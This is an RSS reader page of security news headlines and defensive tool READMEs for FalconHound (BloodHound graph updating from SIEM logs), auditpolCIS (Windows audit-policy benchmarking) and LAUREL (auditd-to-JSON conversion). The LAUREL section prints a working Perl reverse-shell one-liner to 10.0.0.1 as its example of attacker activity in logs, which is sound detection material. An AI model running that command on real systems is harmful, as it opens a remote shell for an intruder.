FreshRSS

πŸ”’
❌ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

4-Step Approach to Mapping and Securing Your Organization's Most Critical Assets

You’re probably familiar with the term β€œcritical assets”. These are the technology assets within your company's IT infrastructure that are essential to the functioning of your organization. If anything happens to these assets, such as application servers, databases, or privileged identities, the ramifications to your security posture can be severe.  But is every technology asset considered

SHQ Response Platform and Risk Centre to Enable Management and Analysts Alike

In the last decade, there has been a growing disconnect between front-line analysts and senior management in IT and Cybersecurity. Well-documented challenges facing modern analysts revolve around a high volume of alerts, false positives, poor visibility of technical environments, and analysts spending too much time on manual tasks. The Impact of Alert Fatigue and False Positives  Analysts

Detecting Windows-based Malware Through Better Visibility

Despite a plethora of available security solutions, more and more organizations fall victim to Ransomware and other threats. These continued threats aren't just an inconvenience that hurt businesses and end users - they damage the economy, endanger lives, destroy businesses and put national security at risk. But if that wasn’t enough – North Korea appears to be using revenue from cyber

How to Achieve the Best Risk-Based Alerting (Bye-Bye SIEM)

Did you know that Network Detection and Response (NDR) has become the most effective technology to detect cyber threats? In contrast to SIEM, NDR offers adaptive cybersecurity with reduced false alerts and efficient threat response. Are you aware of Network Detection and Response (NDR) and how it’s become the most effective technology to detect cyber threats?  NDR massively

FalconHound - A Blue Team Multi-Tool. It Allows You To Utilize And Enhance The Power Of Blo odHound In A More Automated Fashion

By: Zion3R


FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.

One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.

One of the hardest releationships to gather for BloodHound is the local group memberships and the session information. As blue teamers we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.

This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.

Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.


Other examples where FalconHound can be used:

  • Adding, removing or timing out sessions in the graph, based on logon and logoff events.
  • Marking users and computers as compromised in the graph when they have an incident in Sentinel or MDE.
  • Adding CVE information and whether there is a public exploit available to the graph.
  • All kinds of Azure activities.
  • Recalculating the shortest path to sensitive groups when a user is added to a group or has a new role.
  • Adding new users, groups and computers to the graph.
  • Generating enrichment lists for Sentinel and Splunk of, for example, Kerberoastable users or users with ownerships of certain entities.

The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.

A blog detailing more on why we developed it and some use case examples can be found here

Index:

Supported data sources and targets

FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.

Currently, FalconHound supports the following data sources and or targets:

  • Azure Sentinel
  • Azure Sentinel Watchlists
  • Splunk
  • Microsoft Defender for Endpoint
  • Neo4j
  • MS Graph API (early stage)
  • CSV files

Additional data sources and targets are planned for the future.

At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.


Installation

Since FalconHound is written in Go, there is no installation required. Just download the binary from the release section and run it. There are compiled binaries available for Windows, Linux and MacOS. You can find them in the releases section.

Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to creat all crededentials can be found here.

The recommened way to run FalconHound is to run it as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.

Requirements

  • BloodHound, or at least the Neo4j database for now.
  • A SIEM or other log aggregation tool. Currently, Azure Sentinel and Splunk are supported.
  • Credentials for each endpoint you want to talk to, with the required permissions.

Configuration

FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.


Usage

Default run

To run FalconHound, just run the binary and add the -go parameter to have it run all queries in the actions folder.

./falconhound -go

List all enabled actions

To list all enabled actions, use the -actionlist parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the -go parameter.

./falconhound -actionlist -go

Run with a select set of actions

To run a select set of actions, use the -ids parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the -go parameter.

./falconhound -ids action1,action2,action3 -go

Run with a different config file

By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the -config flag. This can allow you to run multiple instances of FalconHound with different configurations, against different environments.

./falconhound -go -config /path/to/config.yml

Run with a different actions folder

By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the -actions-dir flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.

./falconhound -go -actions-dir /path/to/actions

Run with credentials from a keyvault

By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the -keyvault flag FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault it will fall back to the config file.

./falconhound -go -keyvault

Actions

Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file and is stored in the directory of the source of the information, the query target. The filename is used as the name of the action.

Action folder structure

The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.

The Neo4j actions should be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.

Action files

All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.

There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.

While most items will be fairly self explanatory,there are some important things to note about actions:

Enabled

As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.

Enabled: true

Debug

This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.

Debug: false

Query

The Query field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your SourcePlatform. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.

Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:

MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription) 
RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}

Targets

Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the Name and Enabled fields. The Name field is used to identify the target. The Enabled field is used to enable or disable the target. If this is set to false, the target will be ignored.

CSV

  - Name: CSV
Enabled: true
Path: path/to/filename.csv

Neo4j

The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore it requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The ReplacementFields fields are configured below.

  - Name: Neo4j
Enabled: true
Query: |
MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound'
Parameters:
Computer: Computer
TargetUserSid: TargetUserSid
Timestamp: Timestamp

The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the $parameter_name syntax.

Sentinel

The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

This is why also query output needs to be controlled, you might otherwise flood your target.

  - Name: Sentinel
Enabled: true

Sentinel Watchlists

The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.

 - Name: Watchlist
Enabled: true
WatchlistName: FH_MDE_Exploitable_Machines
DisplayName: MDE Exploitable Machines
SearchKey: DeviceName
Overwrite: true

The WatchlistName field is the name of the watchlist. The DisplayName field is the display name of the watchlist.

The SearchKey field is the column that will be used as the search key.

The Overwrite field is used to determine if the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.

Splunk

Like Sentinel, Splunk will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

  - Name: Splunk
Enabled: true

Azure Data Explorer

Like Sentinel, Splunk will write the results of the query to a ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.

  - Name: ADX
Enabled: true
Table: "name"

Extensions to the graph

Relationship: HadSession

Once a session has ended, it had to be removed from the graph, but this felt like a waste of information. So instead of removing the session,it will be added as a relationship between the computer and the user. The relationship will be called HadSession. The relationship will have the following properties:

{
"till": "2021-08-31T14:00:00Z",
"source": "falconhound",
"reason": "logoff",
}

This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.

Properties

FalconHound will add the following properties to nodes in the graph:

Computer: - 'exploitable': true/false - 'exploits': list of CVEs - 'exposed': true/false - 'ports': list of ports accessible from the internet - 'alertids': list of alert ids

Credential management

The currently supported ways of providing FalconHound with credentials are:

  • Via the config.yml file on disk.
  • Keyvault secrets. This still requires a ServicePrincipal with secrets in the yaml.
  • Mixed mode.

Config.yml

The config file holds all details required by each platform. All items in the config file are case-sensitive. Best practise is to separate the apps on a per service level but you can use 1 AppID/AppSecret for all Azure based actions.

The required permissions for your AppID/AppSecret are listed here.

Keyvault

A more secure way of storing the credentials would be to use an Azure KeyVault. Be aware that there is a small cost aspect to using Keyvaults. Access to KeyVaults currently only supports authentication based on a AppID/AppSecret which needs to be configured in the config.yml file.

The recommended way to set this up is to use a ServicePrincipal that only has the Key Vault Secrets User role to this Keyvault. This role only allows access to the secrets, not even list them. Do NOT reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the use of a Keyvault.

The items to configure in the Keyvault are listed below. Please note Keyvault secrets are not case-sensitive.

SentinelAppSecret
SentinelAppID
SentinelTenantID
SentinelTargetTable
SentinelResourceGroup
SentinelSharedKey
SentinelSubscriptionID
SentinelWorkspaceID
SentinelWorkspaceName
MDETenantID
MDEAppID
MDEAppSecret
Neo4jUri
Neo4jUsername
Neo4jPassword
GraphTenantID
GraphAppID
GraphAppSecret
AdxTenantID
AdxAppID
AdxAppSecret
AdxClusterURL
AdxDatabase
SplunkUrl
SplunkApiToken
SplunkIndex
SplunkApiPort
SplunkHecToken
SplunkHecPort
BHUrl
BHTokenID
BHTokenKey
LogScaleUrl
LogScaleToken
LogScaleRepository

Once configured you can add the -keyvault parameter while starting FalconHound.

Mixed mode / fallback

When the -keyvault parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the config.yml. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.

Deployment

FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.

All log based queries are built to run every 15 minutes. Should processing take too long you might need to tweak this a little. If this is the case it might be recommended to disable certain actions.

Also there might be some overlap with for instance the session actions. If you have a lot of sessions you might want to disable the session actions for Sentinel and rely on the one from MDE. This is assuming you have MDE and Sentinel connected and most machines are onboarded into MDE.

Sharphound / Azurehound

While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to compliment the collection and remove the moment-in-time problem of the peroiodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.

It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day/week or month, and FalconHound every 15 minutes.

License

This project is licensed under the BSD3 License - see the LICENSE file for details.

This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.



Building a Robust Threat Intelligence with Wazuh

Threat intelligence refers to gathering, processing, and analyzing cyber threats, along with proactive defensive measures aimed at strengthening security. It enables organizations to gain a comprehensive insight into historical, present, and anticipated threats, providing context about the constantly evolving threat landscape. Importance of threat intelligence in the cybersecurity ecosystem

CISA Adds Three Security Flaws with Active Exploitation to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog based on evidence of active exploitation in the wild. TheΒ vulnerabilitiesΒ are as follows - CVE-2023-36584Β (CVSS score: 5.4) - Microsoft Windows Mark-of-the-Web (MotW) Security Feature Bypass Vulnerability CVE-2023-1671Β (CVSS score: 9.8) -

Three CISOs Share How to Run an Effective SOC

The role of the CISO keeps taking center stage as a business enabler: CISOs need to navigate the complex landscape of digital threats while fostering innovation and ensuring business continuity. Three CISOs; Troy Wilkinson, CISO at IPG; Rob Geurtsen, former Deputy CISO at Nike; and Tammy Moskites, Founder of CyAlliance and former CISO at companies like Time Warner and Home Depot – shared their

Enhancing Security Operations Using Wazuh: Open Source XDR and SIEM

In today's interconnected world, evolving security solutions to meet growing demand is more critical than ever. Collaboration across multiple solutions for intelligence gathering and information sharing is indispensable. The idea of multiple-source intelligence gathering stems from the concept that threats are rarely isolated. Hence, their detection and prevention require a comprehensive

How Wazuh Improves IT Hygiene for Cyber Security Resilience

IT hygieneΒ is a security best practice that ensures that digital assets in an organization's environment are secure and running properly. Good IT hygiene includes vulnerability management, security configuration assessments, maintaining asset and system inventories, and comprehensive visibility into the activities occurring in an environment. As technology advances and the tools used by

auditpolCIS - CIS Benchmark Testing Of Windows SIEM Configuration


CIS Benchmark testing of Windows SIEM configuration

This is an application for testing the configuration of Windows Audit Policy settings against the CIS Benchmark recommended settings. A few points:

  • The tested system was Windows Server 2019, and the benchmark used was also Windows Server 2019.
  • The script connects with SSH. SSH is included with Windows Server 2019, it just has to be enabled. If you would like to see WinRM (or other) connection types, let me know or send a PR.
  • Some tests are included here which were not included in the CIS guide. The recommended settings for these Subcategories are based on the logging volume for these events, versus the security value. In nearly all cases, the recommendation is to turn off auditing for these settings.
  • The YAML file cis-benchmarks.yaml is the YAML representation of the CIS Benchmark guideline for each Subcategory.
  • The command run under SSH is auditpol /get /category:*


Further details on usage and other background info is at https://www.seven-stones.biz/blog/auditpolcis-automating-windows-siem-cis-benchmarks-testing/



Auditing Kubernetes with Open Source SIEM and XDR

Container technology has gained traction among businesses due to the increased efficiency it provides. In this regard, organizations widely use Kubernetes for deploying, scaling, and managing containerized applications. Organizations should audit Kubernetes to ensure compliance with regulations, find anomalies, and identify security risks. The Wazuh open source platform plays a critical role in

Over 100 Siemens PLC Models Found Vulnerable to Firmware Takeover

Security researchers have disclosed multiple architectural vulnerabilities in Siemens SIMATIC and SIPLUS S7-1500 programmable logic controllers (PLCs) that could be exploited by a malicious actor to stealthily install firmware on affected devices and take control of them. Discovered by Red Balloon Security, the issues are tracked asΒ CVE-2022-38773Β (CVSS score: 4.6), with the low severity

CISA Warns of Critical Flaws Affecting Industrial Appliances from Advantech and Hitachi

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday released two Industrial Control Systems (ICS)Β advisoriesΒ pertaining to severe flaws in Advantech R-SeeNet and Hitachi Energy APM Edge appliances. This consists of three weaknesses in the R-SeeNet monitoring solution, successful exploitation of which "could result in an unauthorized attacker remotely deleting files on the

Critical Bug in Siemens SIMATIC PLCs Could Let Attackers Steal Cryptographic Keys

A vulnerability in Siemens Simatic programmable logic controller (PLC) can be exploited to retrieve the hard-coded, global private cryptographic keys and seize control of the devices. "An attacker can use these keys to perform multiple advanced attacks against Siemens SIMATIC devices and the relatedΒ TIA Portal, while bypassing all four of itsΒ access level protections," industrial cybersecurity

Improve your security posture with Wazuh, a free and open source XDR

Organizations struggle to find ways to keep a good security posture. This is because it is difficult to create secure system policies and find the right tools that help achieve a good posture. In many cases, organizations work with tools that do not integrate with each other and are expensive to purchase and maintain. Security posture management is a term used to describe the process of

Laurel - Transform Linux Audit Logs For SIEM Usage


LAUREL is an event post-processing plugin for auditd(8) to improve its usability in modern security monitoring setups.


Why?

TLDR: Instead of audit events that look like this…

type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…turn them into JSON logs where the mess that your pen testers/red teamers/attackers are trying to make becomes apparent at first glance:

{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

This happens at the source. The generated event even contains useful information about the spawning process:

"PARENT_INFO":{"ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Description

Logs produced by the Linux Audit subsystem and auditd(8) contain information that can be very useful in a SIEM context (if a useful rule set has been configured). However, the format is not well-suited for at-scale analysis: Events are usually split across different lines that have to be merged using a message identifier. Files and program executions are logged via PATH and EXECVE elements, but a limited character set for strings causes many of those entries to be hex-encoded. For a more detailed discussion, see Practical auditd(8) problems.

LAUREL solves these problems by consuming audit events, parsing and transforming them into more data and writing them out as a JSON-based log format, while keeping all information intact that was part of the original audit log. It does not replace auditd(8) as the consumer of audit messages from the kernel. Instead, it uses the audisp ("audit dispatch") interface to receive messages via auditd(8). Therefore, it can peacefully coexist with other consumers of audit events (e.g. some EDR products).

Refer to JSON-based log format for a description of the log format.

We developed this tool because we were not content with feature sets and performance characteristics of existing projects and products. Please refer to Performance for details.

A word about audit rules

A good starting point for an audit ruleset is https://github.com/Neo23x0/auditd, but generally speaking, any ruleset will do. LAUREL will currently only work as designed if End Of Event record are not suppressed, so rules like

-a always,exclude -F msgtype=EOE

should be removed.

Events with context

Every event that is caused by a syscall or filesystem rule is annotated with information about the parent of the process that caused the event. If available, id points to the message corresponding to the last execve syscall for this process:

"PARENT_INFO": {
"ID": "1643635026.276:327308",
"comm": "sh",
"exe": "/usr/bin/dash",
"ppid": 1532
}

Adding more context: Keys and process labels

Audit events can contain a key, a short string that can be used to filter events. LAUREL can be configured to recognize such keys and add them as keys to the process that caused the event. These labels can also be propagated to child processes. This is useful to avoid expensive JOIN-like operations in log analysis to filter out harmless events.

Consider the following rule that set keys for apt and dpkg invocations:

-w /usr/bin/apt-get -p x -k software_mgmt

Let's configure LAUREL to turn the software_mgmt key into a process label that is propagated to child processes:

Together with a ruleset that logs execve(2) and variants, this will cause every event directly caused by apt-get and its subprocesses to be labelled software_mgmt.

For example, running sudo apt-get update on a Debian/bullseye system with a few sources configured, the following subprocesses labelled software_gmt can be observed in LAUREL's audit log:

  • apt-get update
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/https
  • /usr/lib/apt/methods/http
  • /usr/lib/apt/methods/gpgv
  • /usr/lib/apt/methods/gpgv
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/bin/dpkg --print-foreign-architectures

This sort of tracking also works for package installation or removal. If some package's post-installation script is behaving suspiciously, a SIEM analyst will be able to make the connection to the software installation process by inspecting the single event.

Installation

See INSTALL.md.

License

GNU General Public License, version 3

Authors

The logo was created by Birgit Meyer <hello@biggi.io>.



❌